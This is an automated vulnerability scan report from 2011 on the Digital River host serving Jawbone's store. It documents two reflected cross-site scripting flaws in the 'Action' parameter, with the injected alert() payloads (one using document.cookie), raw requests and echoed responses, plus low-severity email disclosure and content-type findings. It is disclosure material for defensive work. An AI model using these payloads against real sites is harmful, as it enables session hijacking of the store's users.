XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, drh.img.ditigalriver.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 17 07:13:53 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://drh.img.digitalriver.com/DRHM/store [Action parameter]

1.2. http://drh.img.digitalriver.com/store [Action parameter]

2. Email addresses disclosed

2.1. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/DD_belatedPNG_0.0.7a-min.js

2.2. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngFix.min.js

2.3. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js

3. Content type incorrectly stated

3.1. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/images/common/EditCart.gif

3.2. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/images/common/spec.gif

3.3. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/images/favicona.ico

3.4. http://drh.img.digitalriver.com/DRHM/store



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://drh.img.digitalriver.com/DRHM/store [Action parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98e8b'%3balert(1)//f65ae8d6653 was submitted in the Action parameter. This input was echoed as 98e8b';alert(1)//f65ae8d6653 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /DRHM/store?Action=DisplayPage98e8b'%3balert(1)//f65ae8d6653&SiteID=aliphcom&Locale=en_US&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet48ac6%27%3balert(document.cookie)//4dce4f451bd&SiteID=aliphcom&StyleID=7270400&StyleVersion=63&styleIncludeFile=style.css
Cookie: __utma=187719549.548353174.1305633871.1305633871.1305633871.1; __utmb=187719549.1.10.1305633871; __utmc=187719549; __utmz=187719549.1305633871.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Tue, 17 May 2011 12:04:37 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=65658770837,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app59
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Wed, 18 May 2011 12:04:37 GMT
Date: Tue, 17 May 2011 12:04:37 GMT
Connection: close
Content-Length: 42363


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<link rel="stylesheet" href="/
...[SNIP]...
ibutes: ['platform', 'miniCartImage']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayPage98e8b';alert(1)//f65ae8d6653',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=aliphcom&Locale=en_US&nextAction=DisplayPage98e8b';alert(1)//f65ae8d6653&StyleID=7270400&StyleV
...[SNIP]...

1.2. http://drh.img.digitalriver.com/store [Action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /store

Issue detail

The value of the Action request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48ac6'%3balert(1)//4dce4f451bd was submitted in the Action parameter. This input was echoed as 48ac6';alert(1)//4dce4f451bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?Action=DisplayContentManagerStyleSheet48ac6'%3balert(1)//4dce4f451bd&SiteID=aliphcom&StyleID=7270400&StyleVersion=63&styleIncludeFile=style.css HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://store.jawbone.com/store/aliphcom/DisplayHomePage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Last-Modified: Tue, 17 May 2011 10:58:42 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=65654720626,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app54
Cache-Control: max-age=86400
Expires: Wed, 18 May 2011 10:58:42 GMT
Date: Tue, 17 May 2011 10:58:42 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 42404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<link rel="stylesheet" href="/
...[SNIP]...
'miniCartImage']
}
});
// Initialize the MiniCart
MiniCart.init({
progressBarTop: 'DYNAMIC',
errorText: 'Error:',
environment: 'BASE',
currentAction: 'DisplayContentManagerStyleSheet48ac6';alert(1)//4dce4f451bd',
nextActionParam: 'ACTION_OVERRIDE',
xslUrl: '/DRHM/store?Action=DisplaySCSMiniCartXslPage&SiteID=aliphcom&Locale=en_US&nextAction=DisplayContentManagerStyleSheet48ac6';alert(1)//4dce4f451bd&St
...[SNIP]...

2. Email addresses disclosed  previous  next
There are 3 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


2.1. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/DD_belatedPNG_0.0.7a-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/aliphcom/cm/multimedia/DD_belatedPNG_0.0.7a-min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /DRHM/Storefront/Site/aliphcom/cm/multimedia/DD_belatedPNG_0.0.7a-min.js HTTP/1.1
Host: drh.img.digitalriver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=187719549.1305633871.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; s_sq=%5B%5BB%5D%5D; __utma=187719549.548353174.1305633871.1305633871.1305633871.1; __utmc=187719549; __utmb=187719549.4.10.1305633871;

Response

HTTP/1.1 200 OK
ETag: "15e2-4b4576f1"
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Jan 2010 05:53:53 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=7200+0;age=0;ecid=94952012992,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app55
Cache-Control: max-age=129600
Expires: Thu, 19 May 2011 00:07:51 GMT
Date: Tue, 17 May 2011 12:07:51 GMT
Content-Length: 5602
Connection: close

/**
* DD_belatedPNG: Adds IE6 support: PNG images for CSS background-image and HTML <IMG/>.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_belatedPNG/
* Version: 0.0.7a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_belatedPNG/#license
*
* Example usage:
* DD
...[SNIP]...

2.2. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngFix.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngFix.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /DRHM/Storefront/Site/aliphcom/cm/multimedia/jquery.pngFix.min.js HTTP/1.1
Host: drh.img.digitalriver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=187719549.1305633871.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; s_sq=%5B%5BB%5D%5D; __utma=187719549.548353174.1305633871.1305633871.1305633871.1; __utmc=187719549; __utmb=187719549.4.10.1305633871;

Response

HTTP/1.1 200 OK
ETag: "dd5-4b457709"
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Jan 2010 05:54:17 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=7200+0;age=0;ecid=64887241977,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app52
Cache-Control: max-age=129600
Expires: Thu, 19 May 2011 00:07:51 GMT
Date: Tue, 17 May 2011 12:07:51 GMT
Content-Length: 3541
Connection: close

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2b, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
*/

(function
...[SNIP]...

2.3. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /DRHM/Storefront/Site/aliphcom/cm/multimedia/s_code.js HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://store.jawbone.com/store/aliphcom/DisplayHomePage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "5003-4b8cdee8"
Content-Type: application/x-javascript
Last-Modified: Tue, 02 Mar 2010 09:48:24 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (G;max-age=7200+0;age=0;ecid=21638107522,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app55
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=28534
Expires: Tue, 17 May 2011 18:50:43 GMT
Date: Tue, 17 May 2011 10:55:09 GMT
Connection: close
Content-Length: 20483

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="oneoverzerotechjawbonedev"
var s=s_gi(s_account)
/*****
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

3. Content type incorrectly stated  previous
There are 4 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


3.1. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/images/common/EditCart.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/aliphcom/cm/images/common/EditCart.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /DRHM/Storefront/Site/aliphcom/cm/images/common/EditCart.gif HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.jawbone.com/store/aliphcom/en_US/buy/ACTION_OVERRIDE.DisplayHomePage/productID.224263600
Cookie: __utma=187719549.548353174.1305633871.1305633871.1305633871.1; __utmb=187719549.4.10.1305633871; __utmc=187719549; __utmz=187719549.1305633871.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
ETag: "439-4b5fe590"
Content-Type: image/gif
Last-Modified: Wed, 27 Jan 2010 07:04:48 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=777;ecid=94677090635,0)
Content-Length: 1081
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app55
Accept-Ranges: bytes
Cache-Control: max-age=51750
Expires: Wed, 18 May 2011 02:28:56 GMT
Date: Tue, 17 May 2011 12:06:26 GMT
Connection: close

.PNG
.
...IHDR................(....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...IK#A..+......F!.....?.......'.Cx..'...`TB....o..7..J....$.....T.....U...........J.rO|ll...|...v..N#2/B...)b.?.E|B....
...[SNIP]...

3.2. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/images/common/spec.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/aliphcom/cm/images/common/spec.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /DRHM/Storefront/Site/aliphcom/cm/images/common/spec.gif HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Referer: http://store.jawbone.com/store/aliphcom/DisplayHomePage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "d98-4b57efce"
Content-Type: image/gif
Last-Modified: Thu, 21 Jan 2010 06:10:22 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=3600+360;age=3531;ecid=21638107301,0)
Content-Length: 3480
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app55
Accept-Ranges: bytes
Cache-Control: max-age=75061
Expires: Wed, 18 May 2011 07:46:11 GMT
Date: Tue, 17 May 2011 10:55:10 GMT
Connection: close

.PNG
.
...IHDR...3......... ......    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

3.3. http://drh.img.digitalriver.com/DRHM/Storefront/Site/aliphcom/cm/images/favicona.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/Storefront/Site/aliphcom/cm/images/favicona.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /DRHM/Storefront/Site/aliphcom/cm/images/favicona.ico HTTP/1.1
Host: drh.img.digitalriver.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "57e-4d1b8428"
Content-Type: text/plain
Last-Modified: Wed, 29 Dec 2010 18:55:36 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=24570;ecid=98947518591,0)
Content-Length: 1406
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app57
Accept-Ranges: bytes
Cache-Control: max-age=96612
Expires: Wed, 18 May 2011 13:48:48 GMT
Date: Tue, 17 May 2011 10:58:36 GMT
Connection: close

..............h.......(....... ...............................:::.+++......888.))).................EEE.666.'''.....            .RRR.CCC.444.%%%.........AAA.222.###.............???.000.!!!.............===...
...[SNIP]...

3.4. http://drh.img.digitalriver.com/DRHM/store  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://drh.img.digitalriver.com
Path:   /DRHM/store

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain plain text.

Request

GET /DRHM/store?Action=DisplayPage&SiteID=aliphcom&Locale=en_US&id=TopHeaderPopUpCssStylePage HTTP/1.1
Host: drh.img.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet48ac6%27%3balert(document.cookie)//4dce4f451bd&SiteID=aliphcom&StyleID=7270400&StyleVersion=63&styleIncludeFile=style.css
Cookie: __utma=187719549.548353174.1305633871.1305633871.1305633871.1; __utmb=187719549.1.10.1305633871; __utmc=187719549; __utmz=187719549.1305633871.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: text/css;charset=UTF-8
Last-Modified: Tue, 17 May 2011 12:04:31 GMT
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (M;max-age=86400+0;age=0;ecid=95723536261,0)
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app57
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Wed, 18 May 2011 12:04:32 GMT
Date: Tue, 17 May 2011 12:04:32 GMT
Connection: close
Content-Length: 6276


<!-- REQUEST ID: TIME=1305633871934:NODE=c1a5704:THREAD=99 -->


<style type="text/css">
/* popUp overlay */
.popup_window_title_bar_wrapper {width: inherit; height: 34px;}
.popu
...[SNIP]...

Report generated by XSS.CX at Tue May 17 07:13:53 CDT 2011.